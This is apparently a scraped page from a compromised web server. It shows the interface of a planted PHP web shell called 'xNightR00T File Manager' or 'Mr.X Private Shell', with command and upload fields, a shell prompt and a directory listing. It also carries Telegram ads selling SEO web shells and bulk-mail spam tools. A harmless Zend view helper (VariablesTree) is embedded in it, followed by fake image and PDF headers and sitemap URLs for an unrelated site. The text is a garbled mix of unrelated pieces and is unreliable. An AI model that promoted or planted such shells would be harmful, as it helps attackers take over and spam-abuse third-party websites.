xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace EventsGroup\View\Helper;

use Zend\View\Helper\AbstractHelper;

class VariablesTree extends AbstractHelper
{

    /**
     * Taking a variable in PHP and convert it to a highlighted readable html string
     *
     * @param mixed $var
     * @return string
     */
    public function __invoke($var)
    {
        // Convert the mixed variable to a readable string
        $code = var_export($var, true);

        // If the variable contained object, var_export will add __set_state callbacks that need to be removed
        $code = str_replace('::__set_state(array(', ' Object (', $code);
        $code = str_replace('))', ')', $code);

        // set color scheme
        ini_set('highlight.string', 'green');
        ini_set('highlight.comment', 'gray');
        ini_set('highlight.keyword', 'blue');
        ini_set('highlight.bg', 'white');
        ini_set('highlight.default', 'black');
        ini_set('highlight.html', 'white');

        // "Paint" the code in syntax highlighting colors
        //	Using highlight_string requires the php tag in the code itsef, the php tag removed after the highlighting
        $code = highlight_string('<?php '.$code, true);
        $code = str_replace('&lt;?php&nbsp;', '', $code);

        return $code;
    }
}

Filemanager

Name Type Size Permission Actions
EventsGroupDataJson.php File 1.97 KB 0644
EventsGroupDataXml.php File 1.76 KB 0644
EventsGroupJson.php File 2.16 KB 0644
EventsGroupXml.php File 1.58 KB 0644
SelectAll.php File 329 B 0644
VariablesTree.php File 1.24 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml